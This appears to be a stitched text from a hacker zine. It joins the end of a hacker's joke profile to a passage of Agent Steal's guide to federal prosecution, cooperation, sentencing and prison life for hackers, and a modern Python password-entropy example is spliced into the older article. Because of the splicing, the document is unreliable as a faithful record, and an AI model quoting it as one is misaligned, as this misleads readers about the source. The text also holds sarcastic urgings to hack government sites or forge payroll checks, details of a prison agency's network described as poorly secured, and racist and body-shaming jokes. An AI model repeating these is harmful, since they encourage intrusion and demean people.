          Computers: Yes please. Extra Mayo, No onions.
           Admin of: Nothing. I'm not an admin.
   Sites Frequented: www.scientology.org (If you are going to hack someone,
                     hack me.)
               URLs: The web is a really good excuse to waste time unless
                     you are doing research, distributing religious propaganda,
                     or selling sex oriented products.

[ Favorite Things

              Women: Daemon9, are you trying to ask me something?
               Cars: Porsche Carrera whatever
              Foods: The Roxy in Encinitas, Ca., Filibertos in Encinitas, Ca.,
                     and of course, "deli world" in the San Francisco ghetto
                     (Excelsior). $1 food is next door.
              Music: Fugazi, Jazz, Acid Jazz, Lounge, Gregorian Chant, Jon
                     Spencer - Orange, One Dollar Food (Mondays at the Red
                     Devil Lounge in SF Feds Welcome, but have good suits and
                     fast sneakers so I know who you are)
             Movies: Usual Suspects, Ferris Buellers Day Off, Mall Rats,
                     Anything not starring pauly shore or Rodney Dangerfield.
              Books: Chaos, making a new science by James Gleick
                     The C programming language, by Wik, and AlsO wik.
             Quotes: "Why I just can't seem to dance" - A documentary by Daemon9
                     "Hell hath no fury like a woman's scorn for Sega" - Brodie.
                     "Woohoo! The water in this bathtub sure is ... white!"
                     - B. Clinton.
                     "Woohoo! Jessie Jackson sure is black!" - Pat Buchanan.
                     "I just never can seem to find things when I need them"
                     - Ollie North.
                     "People will eat shit, if you just put salad dressing on
                     it." - B. Gates.
                     "ARF! grr." - Tattoo.
           Turn Ons: * Miniskirts, Garters, Vinyl, Perfume, Meat Eaters, Smart
                     Girls without attitudes.
          Turn Offs: * Fat, ugly, smelly, vegetarian "granolas" with no
                     personality who wear 20 year old clothes that they still
                     have not washed yet, and lack the social skills or
                     capacity to learn.
                     * Salespeople

[ Passions

    - Business (penetration testing / security auditing).
    - Tropical places (relaxation).
    - Urban places (excitement).
    - Winky, the magic dog, mule, hare catcher.
    - Computers / networking.
    - My girlfriend.
    - Europe in general (but honestly, if you are Dutch and you own a restaurant,
      come to the US, and learn about ground beef. Also, figure out what "well
      done" means. Honestly though, I must compliment you on your excellent
      selection of various strains of marijuana).


[ Memorable experiences

    - Owning switches over the Internet (TCP --> X.25).
    - Owning my first nice car.
    - Owning your machine.
    - Getting punched by a large Sicilian, and getting knocked out.
    - Putting a large Sicilian in the hospital.

[ People to mention

    - Joan Croc, for all of the millions of dollars she never gave me.
    - Daemon9, for patting me on the back and breaking my spine by accident.
    - My girlfriend, for being the awesome girl next door.
    - Her parents, for feeding me all the time.
    - Tattoo, my puppy ... for pissing on my bed, my floor, and all my clothes.
    - Everyone who has ever served me coffee.
    - Everyone who has ever betrayed me. Thanks so much for your warmth and
      compassion.
    - Mr Rogers. Using drugs to teach America's youth the moral responsibilities
      they should adopt for their upcoming, bright futures, and using puppets to
      illustrate the values of a smoothly flowing dictatorship.
    - My parents, for tolerating all the weird phone calls from the rest of you
      fuckers for many years, and for motivating me to learn about things I was
      interested in by telling me that I would never get a job if I didn't go to
      college. Heck, at least I didn't buy a degree out of a magazine, and end up
      President of the United States.
    - Oprah, for providing me with entertainment while I watched you expand and
      contract like a blowfish. (I don't think she reads this anyway) (But if I'm
      wrong, and Oprah is an avid phrack reader, then by all means .. sorry, it
      was only a joke... Besides, according to MiB, you're an alien).

[ Pearls Of Wisdom

    - Don't take any wooden nickels, but if you do, make sure you get enough to
      build a log cabin. Don't take any log cabins, but if you do, cut them up
      small enough that you can give a lot of people wooden nickels.
    - Don't make up any cliches, but if you do, make sure they're funny.
    - Make your business work for you, don't work for your business.
    - Never ignore the ones you love.
    - Buy quality merchandise for your home the first time around... unless you
      have roommates.
    - If everyone else around you gets caught, it's time to stop.
    - If a speaker is a speaker, and not a "Sound emissions device", then is
      toilet paper "toilet paper", or "Butt Wiping Cloth?"
    - Eat out a lot, unless she tells you to stop.
    - All the people who consistently come on irc and ask "teach me how to hack",
      first of all, most of the people on irc understand English as well as its
      associated rules of grammar. Second, pick up a fricking book once in a
      while and you might actually be surprised at what you are capable of. We're
      supposed to be evolving, remember?
    - When I was a young boy, I ate a snail. If you are a young boy, don't.
    - If you beat the shit out of someone, make sure it's not in front of my house,
      because I don't want to clean up all that shit.

----[ EOF
sound a little harsh, but considering the fact that the U.S. Attorney's Office
has a 95% conviction rate, it may be sage advice. However, I don't want to
gloss over the importance of a ready for trial posturing. If you have a
strong trial attorney, and have a strong case, it will go a long way towards
good plea bargain negotiations.


C. PLEA AGREEMENTS AND ATTORNEYS 


Your attorney can be your worst foe or your finest advocate. Finding 
the proper one can be a difficult task. Costs will vary and typically the 
attorney asks you how much cash you can raise and then says, "that amount will 
be fine". In actuality a simple plea and sentencing should run you around 
$15,000. Trial fees can easily soar into the 6 figure category. And finally, 
a post conviction specialist will charge $5000 to $15,000 to handle your 
sentencing presentation with final arguments. 


You may however, find yourself at the mercy of the Public Defender's
Office. Usually they are worthless, occasionally you'll find one that will
fight for you. Essentially it's a crap shoot. All I can say is if you don't
like the one you have, fire them and hope you get appointed a better one. If
you can scrape together $5000 for a sentencing (post conviction) specialist to
work with your public defender I would highly recommend it. This specialist
will make certain the judge sees the whole picture and will argue in the most
effective manner for a light or reasonable sentence. Do not rely on your
public defender to thoroughly present your case. Your sentencing hearing is
going to flash by so fast you'll walk out of the court room dizzy. You and
your defense team need to go into that hearing fully prepared, having already
filed a sentencing memorandum.


The plea agreement you sign is going to affect you and your case well
after you are sentenced. Plea agreements can be tricky business and if you
are not careful or are in a bad defense position (the case against you is
strong), your agreement may get the best of you. There are many issues in a
plea to negotiate over. But essentially my advice would be to avoid signing
away your right to appeal. Once you get to a real prison with real jailhouse
lawyers you will find out how bad you got screwed. That issue notwithstanding,
you are most likely going to want to appeal. This being the case you need to
remember two things: bring all your appealable issues up at sentencing and
file a notice of appeal within 10 days of your sentencing. Snooze and lose.


I should however, mention that you can appeal some issues even though 
you signed away your rights to appeal. For example, you can not sign away 
your right to appeal an illegal sentence. If the judge orders something that 
is not permissible by statute, you then have a constitutional right to appeal 
your sentence. 


I will close this subpart with a prison joke. Q: How can you tell when 
your attorney is lying? A: You can see his lips moving. 


D. CONSPIRACY 


Whatever happened to getting off on a technicality? I'm sorry to say
those days are gone, left only to the movies. The courts generally dismiss
many arguments as "harmless error" or "the government acted in good faith".
The most alarming trend, and surely the root of the prosecution's success, are
the liberally worded conspiracy laws. Quite simply, if two or more people
plan to do something illegal, then one of them does something in furtherance
of the objective (even something legal), then it's a crime. Yes, it's true.
In America it's illegal to simply talk about committing a crime. Paging Mr.
Orwell. Hello?


Here’s a hypothetical example to clarify this. Bill G. and Marc A. are 
hackers (can you imagine?) Bill and Marc are talking on the phone and 
unbeknownst to them the FBI is recording the call. They talk about hacking 
into Apple’s mainframe and erasing the prototype of the new Apple Web Browser. 
Later that day, Marc does some legitimate research to find out what type of 
mainframe and operating system Apple uses. The next morning, the Feds raid 
Marc’s house and seize everything that has wires. Bill and Marc go to trial 
and spend millions to defend themselves. They are both found guilty of
conspiracy to commit unauthorized access to a computer system.


E. SENTENCING 


At this point it is up to the probation department to prepare a report 
for the court. It is their responsibility to calculate the loss and identify 
any aggravating or mitigating circumstances. Apple Computer Corporation 
estimates that if Bill and Marc would have been successful it would have 
resulted in a loss of $2 million. This is the figure the court will use. 
Based on this basic scenario our dynamic duo would receive roughly three-year 
sentences. 


As I mentioned, sentencing is complex and many factors can decrease or 
increase a sentence, usually the latter. Let’s say that the FBI also found a 
file on Marc’s computer with 50,000 unauthorized account numbers and passwords 
to The Microsoft Network. Even if the FBI does not charge him with this, it 
could be used to increase his sentence. Generally the government places a 
$200-per-account attempted loss on things of this nature (i.e. credit card 
numbers and passwords = access devices). This makes for a $10 million loss. 
Coupled with the $2 million from Apple, Marc is going away for about nine 
years. Fortunately there is a Federal Prison not too far from Redmond, WA so 
Bill could come visit him. 


Some of the other factors to be used in the calculation of a sentence 
might include the following: past criminal record, how big your role in the 
offense was, mental disabilities, whether or not you were on probation at the 
time of the offense, if any weapons were used, if any threats were used, if 
your name is Kevin Mitnick (heh), if an elderly person was victimized, if you 
took advantage of your employment position, if you are highly trained and used 
your special skill, if you cooperated with the authorities, if you show 
remorse, if you went to trial, etc. 


These are just some of the many factors that could either increase or
decrease a sentence. It would be beyond the scope of this article to cover
the U.S.S.G. in complete detail. I do feel that I have skipped over some
significant issues. Nevertheless, if you remember my two main points in
addition to how the conspiracy law works, you'll be a long way ahead in
protecting yourself.


F. USE OF A SPECIAL SKILL 


The only specific "sentencing enhancement" I would like to cover would 
be one that I am responsible for setting a precedent with. In U.S. v Petersen, 
98 F.3d. 502, 9th Cir., the United States Court of Appeals held that some 
computer hackers may qualify for the special skill enhancement. What this 
generally means is a 6 to 24 month increase in a sentence. In my case it 
added eight months to my 33-month sentence bringing it to 41 months. 
Essentially the court stated that since I used my "Sophisticated" hacking 
skills towards a legitimate end as a computer security consultant, then the 
enhancement applies. It’s ironic that if I were to have remained strictly a 
criminal hacker then I would have served less time. 


The moral of the story is that the government will find ways to give 
you as much time as they want to. The U.S.S.G. came into effect in 1987 in an 
attempt to eliminate disparity in sentencing. Defendants with similar crimes 
and similar backgrounds would often receive different sentences. Unfortunately, 
this practice still continues. The U.S.S.G. are indeed a failure. 


G. GETTING BAIL 


In the past, the Feds might simply have executed their raid and then
left without arresting you. Presently this method will be the exception
rather than the rule and it is more likely that you will be taken into custody
at the time of the raid. Chances are also good that you will not be released
on bail. This is part of the government's plan to break you down and win their
case. If they can find any reason to deny you bail they will. In order to
qualify for bail, you must meet the following criteria:
- You must be a resident of the jurisdiction in which you were arrested.
- You must be gainfully employed or have family ties to the area.
- You cannot have a history of failure to appear or escape.
- You cannot be considered a danger or threat to the community.


In addition, your bail can be denied for the following reasons:


- Someone came forward and stated to the court that you said you would flee if
  released.
- Your sentence will be long if convicted.
- You have a prior criminal history.
- You have pending charges in another jurisdiction.


What results from all this "bail reform" is that only about 20% of 
persons arrested make bail. On top of that it takes 1-3 weeks to process your 
bail papers when property is involved in securing your bond. 


Now you’re in jail, more specifically you are either in an 
administrative holding facility or a county jail that has a contract with the 
Feds to hold their prisoners. Pray that you are in a large enough city to 
justify its own Federal Detention Center. County jails are typically the last 
place you would want to be. 


H. STATE VS. FEDERAL CHARGES 


In some cases you will be facing state charges with the possibility of 
the Feds "picking them up." You may even be able to nudge the Feds into 
indicting you. This is a tough decision. With the state you will do 
considerably less time, but will face a tougher crowd and conditions in prison. 
Granted, Federal Prisons can be violent too, but generally as a non-violent 
white collar criminal you will eventually be placed into an environment with 
other low security inmates. More on this later. 


Until you are sentenced, you will remain as a "pretrial inmate" in 
general population with other inmates. Some of the other inmates will be 
predatorial but the Feds do not tolerate much nonsense. If someone acts up, 
they'll get thrown in the hole. If they continue to pose a threat to the
inmate population, they will be left in segregation (the hole). Occasionally 
inmates that are at risk or that have been threatened will be placed in 
segregation. This isn’t really to protect the inmate. It is to protect the 
prison from a lawsuit should the inmate get injured. 


I. COOPERATING 


Naturally when you are first arrested the suits will want to talk to 
you. First at your residence and, if you appear to be talkative, they will 
take you back to their offices for an extended chat and a cup of coffee. My 
advice at this point is tried and true and we’ve all heard it before: remain 
silent and ask to speak with an attorney. Regardless of what the situation is, 
or how you plan to proceed, there is nothing you can say that will help you. 
Nothing. Even if you know that you are going to cooperate, this is not the 
time. 


This is obviously a controversial subject, but the fact of the matter 
is roughly 80% of all defendants eventually confess and implicate others. This 
trend stems from the extremely long sentences the Feds are handing out these 
days. Not many people want to do 10 to 20 years to save their buddies’ hides 
when they could be doing 3 to 5. This is a decision each individual needs to 
make. My only advice would be to save your close friends and family. Anyone 
else is fair game. In the prison system the blacks have a saying "Getting
down first." It's no secret that the first defendant in a conspiracy is
usually going to get the best deal. I’ve even seen situations where the big 
fish turned in all his little fish and received 40% off his sentence. 


Incidentally, being debriefed or interrogated by the Feds can be an 
ordeal in itself. I would -highly- recommend reading up on interrogation 
techniques ahead of time. Once you know their methods it will be all quite 
transparent to you and the debriefing goes much more smoothly.


When you make a deal with the government you’re making a deal with the 
devil himself. If you make any mistakes they will renege on the deal and 
you’ll get nothing. On some occasions the government will trick you into 
thinking they want you to cooperate when they are not really interested in 
anything you have to say. They just want you to plead guilty. When you sign 
the cooperation agreement there are no set promises as to how much of a 
sentence reduction you will receive. That is to be decided after your 
testimony, etc. and at the time of sentencing. It’s entirely up to the judge. 
However, the prosecution makes the recommendation and the judge generally goes 
along with it. In fact, if the prosecution does not motion the court for your 
"downward departure" the court's hands are tied and you get no break.


As you can see, cooperating is a tricky business. Most people,
particularly those who have never spent a day in jail, will tell you not to
cooperate. "Don't snitch." This is a noble stance to take. However, in some
situations this is just plain stupid. Saving someone's ass who would easily
do the same to you is a tough call. It's something that needs careful
consideration. Like I said, save your friends then do what you have to do to
get out of prison and on with your life.


I'm happy to say that I was able to avoid involving my good friends
and a former employer in the massive investigation that surrounded my case. It
wasn't easy. I had to walk a fine line. Many of you probably know that I
(Agent Steal) went to work for the FBI after I was arrested. I was
responsible for teaching several agents about hacking and the culture. What
many of you don't know is that I had close FBI ties prior to my arrest. I was
involved in hacking for over 15 years and had worked as a computer security
consultant. That is why I was given that opportunity. It is unlikely however,
that we will see many more of these types of arrangements in the future. Our
relationship ran afoul, mostly due to their passive negligence and lack of
experience in dealing with hackers. The government in general now has their
own resources, experience, and undercover agents within the community. They
no longer need hackers to show them the ropes or the latest security hole.


Nevertheless, if you are in the position to tell the Feds something 
they don’t know and help them build a case against someone, you may qualify 
for a sentence reduction. The typical range is 20% to 70%. Usually it’s 
around 35% to 50%. Sometimes you may find yourself at the end of the 
prosecutorial food chain and the government will not let you cooperate. Kevin 
Mitnick would be a good example of this. Even if he wanted to roll over, I 
doubt it would get him much. He’s just too big of a fish, too much media. My 
final advice in this matter is get the deal in writing before you start 
cooperating. 


The Feds also like it when you "come clean" and accept responsibility. 
There is a provision in the Sentencing Guidelines, 3E1.1, that knocks a little 
bit of time off if you confess to your crime, plead guilty and show remorse. 
If you go to trial, typically you will not qualify for this "acceptance of 
responsibility" and your sentence will be longer. 


J. STILL THINKING ABOUT TRIAL 


Many hackers may remember the Craig Neidorf case over the famous 911
System Operation documents. Craig won his case when it was discovered that
the manual in question, that he had published in Phrack magazine, was not
proprietary as claimed but available publicly from AT&T. It was an egg in
the face day for the Secret Service.


Don't be misled by this. The government learned a lot from this
fiasco and even with the laudable support from the EFF, Craig narrowly
thwarted off a conviction. Regardless, it was a trying experience (no pun
intended) for him and his attorneys. The point I'm trying to make is that it's
tough to beat the Feds. They play dirty and will do just about anything,
including lie, to win their case. If you want to really win you need to know
how they build a case in the first place.


K. SEARCH AND SEIZURE


There is a document entitled "Federal Guidelines For Searching And 
Seizing Computers." It first came to my attention when it was published in 
the 12-21-94 edition of the Criminal Law Reporter by the Bureau of National 
Affairs (Cite as 56 CRL 2023 ). It’s an intriguing collection of tips, cases, 
mistakes and, in general, how to bust computer hackers. It’s recommended 
reading. 


Search and seizure is an ever evolving jurisprudence. What’s not 
permissible today may, through some convoluted Supreme Court logic, be 
permissible and legal tomorrow. Again, a complete treatment of this subject 
is beyond the scope of this paper. But suffice it to say if a Federal agent 
wants to walk right into your bedroom and seize all of your computer equipment 
without a warrant he could do it by simply saying he had probable cause (PC). 
PC is anything that gives him an inkling to believe you were committing a 
crime. Police have been known to find PC to search a car when the trunk sat 
too low to the ground or the high beams were always on. 


L. SURVEILLANCE AND WIRETAPS 


Fortunately the Feds still have to show a little restraint when 
wielding their wiretaps. It requires a court order and they have to show that 
there is no other way to obtain the information they seek, a last resort if 
you will. Wiretaps are also expensive to operate. They have to lease lines 
from the phone company, pay agents to monitor it 24 hours a day and then 
transcribe it. If we are talking about a data tap, there are additional costs. 
Expensive interception/translation equipment must be in place to negotiate the 
various modem speeds. Then the data has to be stored, deciphered, 
decompressed, formatted, protocoled, etc. It’s a daunting task and usually 
reserved for only the highest profile cases. If the Feds can seize the data 
from any other source, like the service provider or victim, they will take 
that route. I don’t know what they hate worse though, asking for outside help 
or wasting valuable internal resources. 


The simplest method is to enlist the help of an informant who will 
testify "I saw him do it!," then obtain a search warrant to seize the evidence 
on your computer. Ba da boom, ba da busted. 


Other devices include a pen register which is a device that logs every 
digit you dial on your phone and the length of the calls, both incoming and 
outgoing. The phone companies keep racks of them at their security 
departments. They can place one on your line within a day if they feel you are 
defrauding them. They don’t need a court order, but the Feds do. 


A trap, or trap and trace, is typically any method the phone company 
uses to log every number that calls a particular number. This can be done on 
the switching system level or via a billing database search. The Feds need a 
court order for this information too. However, I’ve heard stories of 
cooperative telco security investigations passing the information along to an 
agent. Naturally that would be a "harmless error while acting in good faith." 
(legal humor)... 


I’d love to tell you more about FBI wiretaps but this is as far as I 
can go without pissing them off. Everything I’ve told you thus far is public 
knowledge. So I think I’ll stop here. If you really want to know more, catch 
Kevin Poulsen (Dark Dante) at a cocktail party, buy him a Coke and he’ll give 
you an earful. (hacker humor) 


In closing this subpart I will say that most electronic surveillance 
is backed up with at least part-time physical surveillance. The Feds are 
often good at following people around. They like late model mid-sized 
American cars, very stock, with no decals or bumper stickers. If you really 
want to know if you’re under surveillance, buy an Opto-electronics Scout or 
Xplorer frequency counter. Hide it on your person, stick an ear plug in your 
ear (for the Xplorer) and take it everywhere you go. If you hear people 
talking about you, or you continue to hear intermittent static (encrypted 
speech), you probably have a problem. 
M. YOUR PRESENTENCE INVESTIGATION REPORT, PSI OR PSR 


After you plead guilty you will be dragged from the quiet and comfort 
of your prison cell to meet with a probation officer. This has absolutely 
nothing to do with getting probation. Quite the contrary. The P.O. is 
empowered by the court to prepare a complete and, in theory, unbiased profile 
of the defendant. Everything from education, criminal history, psychological 
behavior, offense characteristics plus more will be included in this 
voluminous and painfully detailed report about your life. Every little dirty 
scrap of information that makes you look like a sociopath, demon worshiping, 
loathsome criminal will be included in this report. They’ll put a few negative 
things in there as well. 


My advice is simple. Be careful what you tell them. Have your 
attorney present and think about how what you say can be used against you. 
Here’s an example: 


P.O.: Tell me about your education and what you like to do in your spare time. 


Mr. Steal: I am preparing to enroll in my final year of college. In my spare 
time I work for charity helping orphan children. 


The PSR then reads "Mr. Steal has never completed his education and hangs 
around with little children in his spare time." Get the picture? 


N. PROCEEDING PRO SE 


Pro Se or Pro Per is when a defendant represents himself. A famous 
lawyer once said "a man that represents himself has a fool for a client." 
Truer words were never spoken. However, I can’t stress how important it is to 
fully understand the criminal justice system. Even if you have a great 
attorney it’s good to be able to keep an eye on him or even help out. An 
educated client’s help can be of enormous benefit to an attorney. They may 
think you’re a pain in the ass but it’s your life. Take a hold of it. 
Regardless, representing yourself is generally a mistake. 


However, after your appeal, when your court appointed attorney runs 
out on you, or you have run out of funds, you will be forced to handle matters 
yourself. At this point there are legal avenues, although quite bleak, for 
post-conviction relief. 


But I digress. The best place to start in understanding the legal 
system lies in three inexpensive books. First the Federal Sentencing 
Guidelines ($14.00) and Federal Criminal Codes and Rules ($20.00) are 
available from West Publishing at 800-328-9352. I consider possession of 
these books to be mandatory for any pretrial inmate. Second would be the 
Georgetown Law Journal, available from Georgetown University Bookstore in 
Washington, DC. The book sells for around $40.00 but if you write them a 
letter and tell them you’re a Pro Se litigant they will send it for free. And 
last but not least the definitive Pro Se authority, "The Prisoners Self Help 
Litigation Manual" $29.95 ISBN 0-379-20831-8. Or try 
http://www.oceanalaw.com/books/n148.htm 


O. EVIDENTIARY HEARING 


If you disagree with some of the information presented in the 
presentence report (PSR) you may be entitled to a special hearing. This can 
be instrumental in lowering your sentence or correcting your PSR. One 
important thing to know is that your PSR will follow you the whole time you 
are incarcerated. The Bureau of Prisons uses the PSR to decide how to handle 
you. This can affect your security level, your halfway house, your 
eligibility for the drug program (which gives you a year off your sentence), 
and your medical care. So make sure your PSR is accurate before you get 
sentenced! 


P. GETTING YOUR PROPERTY BACK 
In most cases it will be necessary to formally ask the court to have 
your property returned. They are not going to just call you up and say "Do 
you want this Sparc Station back or what?" No, they would just as soon keep it 
and not asking for it is as good as telling them they can have it. 


You will need to file a 41(e) "Motion For Return Of Property." The 
courts’ authority to keep your stuff is not always clear and will have to be 
taken on a case-by-case basis. They may not care and the judge will simply 
order that it be returned. 


If you don’t know how to write a motion, just send a formal letter to 
the judge asking for it back. Tell him you need it for your job. This should 
suffice, but there may be a filing fee. 


Q. OUTSTANDING WARRANTS 


If you have an outstanding warrant or charges pending in another 
jurisdiction you would be wise to deal with them as soon as possible -after- 
you are sentenced. If you follow the correct procedure chances are good the 
warrants will be dropped (quashed). In the worst case scenario, you will be 
transported to the appropriate jurisdiction, plead guilty and have your "time 
run concurrent." Typically in non-violent crimes you can serve several 
sentences all at the same time. Many Federal inmates have their state time 
run with their Federal time. In a nutshell: concurrent is good, consecutive 
bad. 


This procedure is referred to as the Interstate Agreement On Detainers 
Act (IADA). You may also file a "demand for speedy trial", with the 
appropriate court. This starts the meter running. If they don’t extradite 
you within a certain period of time, the charges will have to be dropped. The 
"Inmates’ Self-Help Litigation Manual" that I mentioned earlier covers this 
topic quite well. 


R. ENCRYPTION 


There are probably a few of you out there saying, "I triple DES 
encrypt my hard drive and 128 character RSA public key it for safety." Well, 
that’s just great, but... the Feds can have a grand jury subpoena your 
passwords and if you don’t give them up you may be charged with obstruction of 
justice. Of course who’s to say otherwise if you forgot your password in all 
the excitement of getting arrested. I think I heard this once or twice before 
in a Senate Sub-committee hearing. "Senator, I have no recollection of the 
aforementioned events at this time." But seriously, strong encryption is 
great. However, it would be foolish to rely on it. If the Feds have your 
computer and access to your encryption software itself, it is likely they 
could break it given the motivation. If you understand the true art of code 
breaking you should understand this. People often overlook the fact that your 
password, the one you use to access your encryption program, is typically less 
than 8 characters long. By attacking the access to your encryption program 
with a keyboard emulation sequencer your triple DES/128 bit RSA crypto is 
worthless. Just remember, encryption may not protect you. 
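The weakest-link argument above, worked through as an added example (this code is not from the article). It assumes uniformly random passwords over the named character sets, a constructed guess rate, 112 bits as the usual strength figure for 3DES, and PBKDF2 from Python's hashlib as the stretching mitigation.

```python
import hashlib
import math
import os

# Constructed alphabet sizes (assumption: passwords are drawn uniformly at
# random from one of these sets; real user-chosen passwords have far less entropy).
ALPHABETS = {
    "digits": 10,
    "lowercase": 26,
    "alphanumeric": 62,
    "printable_ascii": 95,
}

# Nominal key strength of the ciphers the article names. Three-key 3DES is
# generally credited with about 112 bits; the "128 bit" figure is taken at face value.
CIPHER_KEY_BITS = {
    "3DES": 112,
    "128-bit": 128,
}


def password_entropy_bits(length: int, alphabet: str) -> float:
    """Bits of entropy in a uniformly random password of `length` symbols."""
    return length * math.log2(ALPHABETS[alphabet])


def effective_security_bits(cipher: str, pw_length: int, alphabet: str) -> float:
    """An attacker holding the software takes the cheaper route: guessing the
    key, or guessing the password that unlocks it. Effective strength is
    therefore the minimum of the two."""
    return min(CIPHER_KEY_BITS[cipher], password_entropy_bits(pw_length, alphabet))


def expected_guesses(entropy_bits: float) -> float:
    """On average half the space is searched before the right guess."""
    return 2 ** (entropy_bits - 1)


def expected_crack_seconds(entropy_bits: float, guesses_per_second: float,
                           stretch_iterations: int = 1) -> float:
    """Expected wall-clock time to recover a password by exhaustive guessing.
    `stretch_iterations` models a key-derivation function: each guess costs
    that many hash invocations instead of one."""
    return expected_guesses(entropy_bits) * stretch_iterations / guesses_per_second


def derive_key(password: str, salt: bytes, iterations: int) -> bytes:
    """Stretch a passphrase into a 256-bit key with PBKDF2-HMAC-SHA256.
    Raising `iterations` multiplies the attacker's cost per guess by the same
    factor without changing the passphrase."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)


def weakest_link_report(cipher: str, pw_length: int, alphabet: str,
                        guesses_per_second: float, stretch_iterations: int) -> dict:
    """Summarise where the security of one configuration actually sits."""
    pw_bits = password_entropy_bits(pw_length, alphabet)
    return {
        "cipher_bits": CIPHER_KEY_BITS[cipher],
        "password_bits": round(pw_bits, 1),
        "effective_bits": round(effective_security_bits(cipher, pw_length, alphabet), 1),
        "unstretched_seconds": expected_crack_seconds(pw_bits, guesses_per_second),
        "stretched_seconds": expected_crack_seconds(pw_bits, guesses_per_second, stretch_iterations),
    }


if __name__ == "__main__":
    # Constructed guess rate for an unstretched password check; an assumption
    # for illustration, not a measurement.
    rate = 1e9
    for length, alphabet in ((7, "lowercase"), (8, "alphanumeric"), (20, "printable_ascii")):
        r = weakest_link_report("3DES", length, alphabet, rate, stretch_iterations=600_000)
        print(f"{length:>2} chars {alphabet:<15} -> effective {r['effective_bits']:>6} bits, "
              f"{r['unstretched_seconds']:.3g} s unstretched, "
              f"{r['stretched_seconds']:.3g} s stretched")
    salt = os.urandom(16)
    print("derived key:", derive_key("correct horse", salt, 600_000).hex())
```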


S. LEGAL SUMMARY 


Before I move on to the Life in Prison subpart, let me tell you what 
this all means. You’re going to get busted, lose everything you own, not get 
out on bail, snitch on your enemies, get even more time than you expected and 
have to put up with a bunch of idiots in prison. Sound fun? Keep hacking. 
And, if possible, work on those sensitive .gov sites. That way they can hang 
an espionage rap on you. That will carry about 12 to 18 years for a first 
time offender. 


I know this may all sound a bit bleak, but the stakes for hackers have 
gone up and you need to know what they are. Let’s take a look at some recent 
sentences: 


Agent Steal (me)    41 months 
Kevin Poulsen       51 months 
Minor Threat        70 months 
Kevin Mitnick       estimated 7-9 years 


As you can see, the Feds are giving out some time now. If you are 
young, a first-time offender, unsophisticated (like MOD), and were just 
looking around in some little company’s database, you might get probation. But 
chances are that if that is all you were doing, you would have been passed 
over for prosecution. As a rule, the Feds won’t take the case unless $10,000 
in damages are involved. The problem is who is to say what the loss is? The 
company can say whatever figure it likes and it would be tough to prove 
otherwise. They may decide to, for insurance purposes, blame some huge 
downtime expense on you. I can hear it now, "When we detected the intruder, 
we promptly took our system off-line. It took us two weeks to bring it up 
again for a loss in wasted manpower of $2 million." In some cases you might 
be better off just using the company’s payroll system to cut you a couple of 
$10,000 checks. That way the government has a firm loss figure. This would 
result in a much shorter sentence. I’m not advocating blatant criminal actions. 
I just think the sentencing guidelines definitely need some work. 


PART II - FEDERAL PRISON 


A. STATE v. FEDERAL 


In most cases I would say that doing time in a Federal Prison is better 
than doing time in the state institutions. Some state prisons are such 
violent and pathetic places that it’s worth doing a little more time in the 
Federal system. This is going to be changing however. The public seems to 
think that prisons are too comfortable and as a result Congress has passed a 
few bills to toughen things up. 


Federal prisons are generally going to be somewhat less crowded, 
cleaner, and more laid back. The prison I was at looked a lot like a college 
campus with plenty of grass and trees, rolling hills, and stucco buildings. I 
spent most of my time in the library hanging out with Minor Threat. We would 
argue over who was more elite. "My sentence was longer," he would argue. "I 
was in more books and newspapers," I would rebut. (humor) 


Exceptions to the Fed is better rule would be states that permit 
televisions and word processors in your cell. As I sit here just prior to 
release scribbling this article with pen and paper I yearn for even a Smith 
Corona with one line display. The states have varying privileges. You could 
wind up someplace where everything gets stolen from you. There are also 
states that are abolishing parole, thus taking away the ability to get out 
early with good behavior. That is what the Feds did. 


B. SECURITY LEVELS 


The Bureau of Prisons (BOP) has six security levels. Prisons are 
assigned a security level and only prisoners with the appropriate ratings are 
housed there. Often the BOP will have two or three facilities at one location. 
Still, they are essentially separate prisons, divided by fences. 


The lowest level facility is called a minimum, a camp, or FPC. 
Generally speaking, you will find first time, non-violent offenders with less 
than 10 year sentences there. Camps have no fences. Your work assignment at 
a camp is usually off the prison grounds at a nearby military base. Other 
times camps operate as support for other nearby prisons. 


The next level up is a low Federal Correctional Institution (FCI). 
These are where you find a lot of people who should be in a camp but for some 
technical reason didn’t qualify. There is a double fence with razor wire 
surrounding it. Again you will find mostly non-violent types here. You would 
really have to piss someone off before they would take a swing at you. 


Moving up again we get to medium and high FCI’s which are often 
combined. More razor wire, more guards, restricted movement and a rougher 
crowd. It’s also common to find people with 20 or 30+ year sentences. 
Fighting is much more common. Keep to yourself, however, and people generally 
leave you alone. Killings are not too terribly common. With a prison 
population of 1500-2000, about one or two a year leave on a stretcher and don’t 
come back. 


The United States Penitentiary (U.S.P.) is where you find the murderers, 
rapists, spies and the roughest gang bangers. "Leavenworth" and "Atlanta" are 
the most infamous of these joints. Traditionally surrounded by a 40 foot 
brick wall, they take on an ominous appearance. The murder rate per prison 
averages about 30 per year with well over 250 stabbings. 


The highest security level in the system is Max, sometimes referred to 
as "Supermax." Max custody inmates are locked down all the time. Your mail is 
shown to you over a TV screen in your cell. The shower is on wheels and it 
comes to your door. You rarely see other humans and if you do leave your cell 
you will be handcuffed and have at least a three guard escort. Mr. Gotti, the 
Mafia boss, remains in Supermax. So does Aldrich Ames, the spy. 


C. GETTING DESIGNATED 


Once you are sentenced, the BOP has to figure out what they want to do 
with you. There is a manual called the "Custody and Classification Manual" 
that they are supposed to follow. It is publicly available through the 
Freedom of Information Act and it is also in most prison law libraries. 
Unfortunately, it can be interpreted a number of different ways. As a result, 
most prison officials responsible for classifying you do pretty much as they 
please. 


Your first classification is done by the Region Designator at BOP 
Regional Headquarters. As a computer hacker you will most likely be placed in 
a camp or a low FCI. This is assuming you weren’t pulling bank jobs on the 
side. -IF- you do wind up in an FCI, you should make it to a camp after six 
months. This is assuming you behave yourself. 


Another thing the Region Designator will do is to place a "Computer 
No" on your file. This means you will not be allowed to operate a computer at 
your prison work assignment. In my case I wasn’t allowed to be within 10 feet 
of one. It was explained to me that they didn’t even want me to know the 
types of software they were running. Incidentally, the BOP uses PC/Server 
based LANs with NetWare 4.1 running on Fiber 10baseT Ethernet connections to 
Cabletron switches and hubs. PC based gateways reside at every prison. The 
connection to the IBM mainframe (Sentry) is done through leased lines via 
Sprintnet’s Frame Relay service with 3270 emulation software/hardware resident 
on the local servers. Sentry resides in Washington, D.C. with SNA type 
network concentrators at the regional offices. ;-) And I picked all of this up 
without even trying to. Needless to say, BOP computer security is very lax. 
Many of their publicly available "Program Statements" contain specific 
information on how to use Sentry and what it’s designed to do. They have other 
